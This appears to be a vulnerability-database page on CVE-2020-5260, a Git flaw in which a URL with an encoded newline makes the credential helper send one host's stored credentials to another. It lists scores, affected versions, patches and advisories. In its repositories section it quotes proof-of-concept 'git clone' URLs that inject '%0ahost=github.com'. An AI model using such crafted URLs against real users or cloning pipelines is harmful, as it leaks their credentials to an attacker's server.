5
CVSSv2

CVE-2020-5260

Published: 14/04/2020 Updated: 07/11/2023
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 446
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

Affected versions of Git have a vulnerability whereby Git can be tricked into sending private credentials to a host controlled by an attacker. Git uses external "credential helper" programs to store and retrieve passwords or other credentials from secure storage provided by the operating system. Specially-crafted URLs that contain an encoded newline can inject unintended values into the credential helper protocol stream, causing the credential helper to retrieve the password for one server (e.g., good.example.com) for an HTTP request being made to another server (e.g., evil.example.com), resulting in credentials for the former being sent to the latter. There are no restrictions on the relationship between the two, meaning that an attacker can craft a URL that will present stored credentials for any host to a host of their choosing. The vulnerability can be triggered by feeding a malicious URL to git clone. However, the affected URLs look rather suspicious; the likely vector would be through systems which automatically clone URLs not visible to the user, such as Git submodules, or package systems built around Git. The problem has been patched in the versions published on April 14th, 2020, going back to v2.17.x. Anyone wishing to backport the change further can do so by applying commit 9a6bbee (the full release includes extra checks for git fsck, but that commit is sufficient to protect clients against the vulnerability). The patched versions are: 2.17.4, 2.18.3, 2.19.4, 2.20.3, 2.21.2, 2.22.3, 2.23.2, 2.24.2, 2.25.3, 2.26.1.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

git git

git-scm git

debian debian linux 8.0

canonical ubuntu linux 16.04

debian debian linux 9.0

debian debian linux 10.0

canonical ubuntu linux 18.04

fedoraproject fedora 30

opensuse leap 15.1

canonical ubuntu linux 19.10

fedoraproject fedora 31

fedoraproject fedora 32

Vendor Advisories

Git could be made to expose sensitive information ...
Synopsis Important: git security update Type/Severity Security Advisory: Important Topic An update for git is now available for Red Hat Enterprise Linux 8Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, which g ...
Synopsis Important: rh-git218-git security update Type/Severity Security Advisory: Important Topic An update for rh-git218-git is now available for Red Hat Software CollectionsRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVS ...
Synopsis Important: git security update Type/Severity Security Advisory: Important Topic An update for git is now available for Red Hat Enterprise Linux 77 Extended Update SupportRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System ...
Synopsis Important: git security update Type/Severity Security Advisory: Important Topic An update for git is now available for Red Hat Enterprise Linux 80 Update Services for SAP SolutionsRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scori ...
Felix Wilhelm of Google Project Zero discovered a flaw in git, a fast, scalable, distributed revision control system With a crafted URL that contains a newline, the credential helper machinery can be fooled to return credential information for a wrong host For the oldstable distribution (stretch), this problem has been fixed in version 1:2110-3 ...
With a crafted URL that contains a newline in it, the credential helper machinery can be fooled to give credential information for a wrong host The attack has been made impossible by forbidding a newline character in any value passed via the credential protocol (CVE-2020-5260) ...
With a crafted URL that contains a newline in it, the credential helper machinery can be fooled to give credential information for a wrong host The attack has been made impossible by forbidding a newline character in any value passed via the credential protocol(CVE-2020-5260) ...
Affected versions of Git have a vulnerability whereby Git can be tricked into sending private credentials to a host controlled by an attacker This bug is similar to CVE-2020-5260(GHSA-qm7j-c969-7j4q) The fix for that bug still left the door open for an exploit where _some_ credential is leaked (but the attacker cannot control which one) Git uses ...
Felix Wilhelm of Google Project Zero discovered a flaw in git, a fast, scalable, distributed revision control system With a crafted URL that contains a newline, the credential helper machinery can be fooled to return credential information for a wrong host ...

Mailing Lists

<!--X-Body-Begin--> <!--X-User-Header--> oss-sec mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> CVE-2020-11008: Git: Malicious URLs can still cause Git to send a stored credential to the wrong server <!--X-Subject-Header-E ...
<!--X-Body-Begin--> <!--X-User-Header--> oss-sec mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> Re: CVE-2020-5260: Git: malicious URLs may cause Git to present stored credentials to the wrong server <!--X-Subject-Header-En ...

Github Repositories

A HTTP PoC Endpoint for cve-2020-5260 which can be deployed to Heroku

cve-2020-5260 A HTTP PoC Endpoint for cve-2020-5260 which can be deployed to Heroku CREDIT INFORMATION Felix Wilhelm of Google Project Zero bugschromiumorg/p/project-zero/issues/detail?id=2021 Trigger the vuln git clone 'YourHerokuAppNameAndNotMineherokuappcom?%0ahost=githubcom%0aprotocol=ssh' Get PoC onto

CVE-2020-5260演示记录

CVE-2020-5260 CVE-2020-5260演示记录 git在执行类似"git clone examplecom" 这样的命令时,会请求使用协议"https"存储主机"examplecom"的凭据,并在远程端请求身份验证时将返回的凭据附加到发出的请求中 git clone 'localhost:8088/%0ahost=githubcom%0aprotocol=https

References

CWE-522https://github.com/git/git/commit/9a6bbee8006c24b46a85d29e7b38cfa79e9ab21bhttps://github.com/git/git/security/advisories/GHSA-qm7j-c969-7j4qhttps://www.debian.org/security/2020/dsa-4657https://lists.debian.org/debian-lts-announce/2020/04/msg00010.htmlhttp://www.openwall.com/lists/oss-security/2020/04/15/5http://packetstormsecurity.com/files/157250/Git-Credential-Helper-Protocol-Newline-Injection.htmlhttp://www.openwall.com/lists/oss-security/2020/04/15/6http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00027.htmlhttps://support.apple.com/kb/HT211141http://www.openwall.com/lists/oss-security/2020/04/20/1https://security.gentoo.org/glsa/202004-13http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00003.htmlhttps://usn.ubuntu.com/4329-1/https://lore.kernel.org/git/xmqqy2qy7xn8.fsf%40gitster.c.googlers.com/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XPCEOIFLLEF24L6GLVJVFZX4CREDEHDF/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7TVS5UG6JD3MYIGSBKMIOS6AF7CR5IPI/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PN3FUOXKX3AXTULYV53ACABER2W2FSOU/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MOCTR2SEHCPSCOVUQJAGFPGKFMI2VE6V/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/74Q7WVJ6FKLIN62VS2JD2XCNWK5TNKOW/https://usn.ubuntu.com/4329-1/https://nvd.nist.gov